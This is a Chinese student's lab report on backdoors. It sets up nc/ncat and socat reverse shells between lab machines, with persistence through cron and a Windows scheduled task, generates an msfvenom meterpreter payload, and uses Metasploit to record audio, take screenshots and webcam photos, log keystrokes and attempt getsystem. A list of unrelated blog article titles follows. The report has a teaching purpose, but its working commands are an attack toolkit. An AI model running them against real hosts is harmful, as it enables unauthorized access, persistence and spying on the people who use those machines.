【后门概念】

后门就是不经过正常认证流程而访问系统的通道。

特指潜伏于操作系统中专门做后门的一个程序,而“坏人”可以连接这个程序远程执行各种指令。

(概念和木马有重叠)

【学习内容】

使用nc实现win,mac,Linux间的后门连接
meterpreter的应用
MSF POST 模块的应用

【实验内容】

[首先得有这么一个程序]

NC 或 netcat

得放到系统里

还得运行起来

最后还得不被本机的恶意代码检测程序发现,也不能被本机的或网络上的防火墙发现

所以按照以上步骤将实验分为以下几步:

[part1]使用nc或netcat远程获取shell

①win获得Linux shell

在windows系统中打开监听并且获得Linux Shell

在windows系统中打开cmd命令行窗口,键入

ipconfig

查询windows的IP地址为"192.168.75.1"

然后将之前下载的监听程序ncat.exe解压在桌面上,进入命令行,cd进入桌面Desktop,输入指令

ncat.exe -l -p 

监听端口4319,等待其他机器连接。

然后在kali中用windows的ip和连接端口号反弹连接,给出shell权限:

nc 192.168.75.1  -e /bin/sh

这样,获得执行权限的windows就可以执行linux相关命令"ls"

②Linux获得Windows Shell

在kali中键入命令

ifconfig

查询linux系统的IP地址为192.168.64.134,然后在linux中用nc命令直接设置监听本地4319端口(Linux一般自带netcat)

nc -l -p 

在windows系统的命令行窗口中利用linux的ip反弹连接,提供自己的shell:

ncat.exe -e cmd.exe 192.168.64.134 

同理,切换到linux下看到Windows的命令提示,获得windows的shell,可执行指令"dir"

③nc传输数据

用windows监听端口4319

ncat.exe -l 4319

同时kali连接win7的4319端口

nc 192.168.75.1 4319

然后传输通道建立,可以在windows和linux系统之间通过窗口进行"对话"(传输信息的复制)

(这是linux界面)

(这是windows界面)

 [part2]利用netcat获取主机shell,设置cron启动

Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。

在windows系统监听端口

ncat.exe -l -p 

使用crontab指令增加一条定时任务

crontab -e

然后输入“3”进入编辑模式

在最后添加一条定时连接win端口的指令

 * * * * /bin/netcat 192.16875..  -e /bin/sh

当前时间为43分,为了方便测试我设置成离得近的时间节点——每小时的第45分钟,连接IP为192.168.75.1的4319端口

crontab -l

可查看配置的任务如下

然后在windows系统下调出cmd,测试到了45分时,成功获取linux的shell,执行“ls”命令

(呃,忘记截时间了,没关系哈哈哈,反正是到了45分就能执行ls命令)

[part3]使用socat获取主机操作Shell, 任务计划启动

在Windows系统下,打开控制面板搜索“任务计划程序”,然后在右侧菜单栏中选择“创建任务”,任务名称“4319”,新建触发器,选择开始任务时间为:工作站锁定时。

新建操作,选择启动的程序为socat.exe,参数项填为

tcp-listen: exec:cmd.exe,pty,stderr

然后锁定计算机,打开后查看程序运行状态(这里我的锁定之后没有自动运行,我是手动点运行来启动的)

在kali终端输入

socat - tcp:192.168.75.1:

[part4]使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在linux端生成后门程序4319_backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.134 LPORT= -f exe > 4319_backdoor.exe

通过nc指令将生成的后门程序传送到Windows主机上,并运行ncat命令,等待接收后门程序4319_backdoor.exe

ncat.exe -lv  > 4319_backdoor.exe

kali上运行ncat命令,传输4319_backdoor.exe到windows主机上

nc 192.168.75.1  < 4319_backdoor.exe

在win端命令行显示传输成功

确实传输了一个后门程序在桌面上(我也不知道为什么没传进文件夹里???)

在msf端控制台设置反弹回连,在kali上输入指令进入msf控制台

msfconsole

(follow the white rabbit哈哈哈还挺有意思)

然后就开始干正事了(严肃)

配置payload,设置如下

use exploit/multi/handler              //使用handler模块

set payload windows/meterpreter/reverse_tcp   //设置载荷,字面意思应该是基于TCP的反向连接反弹windows shell

show options                      //查看利用模块的设置信息

set LHOST 192.168.64.134              //接下来的两个set是配置模块的设置信息,这里是设置本主机kali的IP

set LPORT                    //设置本主机的端口

show options                     //再次查看一下options,确保设置正确

exploit                        //运行模块

首先配置模块、载荷并查看

此时端口和ip还未设置,“required”选项下为“yes”的表示需要设置,所以接下来我们设置主机IP(设置为linux的ip)、端口

再次查看确认

show options

确认无误,可以放心进行下一步啦!启用模块

第一次启用模块出了点问题,怀疑是我传输到桌面的后台程序没启用,在windows端上用控制台cmd运行一下

这下知道了,是后台程序被占用了,应该是上一次实验调用该程序的控制台窗口没关闭,关掉再试一下

这下成功了,切换到linux端,发现成功获得了windows的连接,并且得到了远程控制的shell,可执行相关命令

(可以看到我桌面上的文件全部都能显示出来,真可怕)

[part5]使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

由上面的exploit操作,已经获得shell,接下来,尝试获取目标主机音频、摄像头、击键记录等内容

①获取目标主机音频、截屏内容

record_mic    //音频

screenshot    //截屏

成功获取文件之后可以在文件主目录中看到

②获取摄像头所拍摄相片(第一次没开启摄像头,拍了个全黑的,调好了就能连接上摄像头了)

(还好有前车之鉴,把脸挡住了)

③获取击键记录

keyscan_start

在win7上用键盘输入之后

在kali上输入指令可获取击键记录

keyscan_dump

④提权

看当前用户

getuid

然后进行提权

getsystem

然而提权失败了(发现原来是需要以管理员身份运行后门程序4319_backdoor.exe)

捣鼓了好几遍

总算好了

【实验感悟】

通过本次实验,除了使我认识到了后台程序的基本运作原理和机制之外,还令我深切体会到了后台程序的可怕,可以获取shell权限,监听受控主机的摄像头和音频设备,甚至获取击键记录(看来以后要增强安全防护意识)。最后,总结一下实验过程中出现的很多问题,因为实验涉及两个终端和系统来回切换,导致我开了一堆后台程序(想关又不敢关),有的窗口关错了可能就导致后台程序调用失败,或者重复占用导致无法获取shell的情况,经过反复总结之后发现我以后面对这种情况还是要灵活应对,冷静分析问题。最后获取权限的时候也出了一堆问题,试了好几遍都没成功,然后不知道试了几遍之后莫名其妙就成功了....(说起来最有意思的部分还是获取音频截屏和摄像头权限了)整体上来看本次实验让我对后台软件4319_backdoor.exe的能实现的操作,做了深入的了解和掌握,包括怎么植入程序,怎么获取shell权限,怎么进入console配置ip和端口,用指令调取权限。

最新文章

  1. Areas on the Cross-Section Diagram
  2. 编译错误:/usr/bin/ld: cannot find -lz
  3. Linux shell:FTP(文件传输协议)上传下载命令
  4. Excel导入导出,通过datatable转存(篇一)
  5. 4 Handler相关类——Live555源码阅读(一)基本组件类
  6. 两个SVN仓库之间代码的转移
  7. (转)Maximum subarray problem--Kadane’s Algorithm
  8. fork()函数
  9. Visual Studio 2010快捷键大全
  10. VS2012界面改为英文
  11. 转载github上最全的资源教程--前端涉及的所有知识体系
  12. stream~filestream
  13. Java并发编程总结2——慎用CAS(转)
  14. ROS time stamp and sync
  15. crontab定时
  16. SQL SERVER 如何声明一个变量
  17. Android View 绘制流程
  18. 【工作感悟】Android 开发者,如何提升自己的职场竞争力?
  19. MXNET:多层神经网络
  20. Enhancement in SAP abap.

热门文章

  1. Linux中常用目录作用
  2. Cesium学习网址
  3. php的运行模式
  4. 通过nginx日志,统计最近两天的交易笔数
  5. docker:学习笔记
  6. Awvs、Snort的下载安装
  7. 慕课网c#开发轻松入门6-8最终项目
  8. 视频剪辑软件调研:Adobe Premiere、会声会影、抖音短视频
  9. session的处理机制
  10. Python环境下的Sublime Text3无法使用input()函数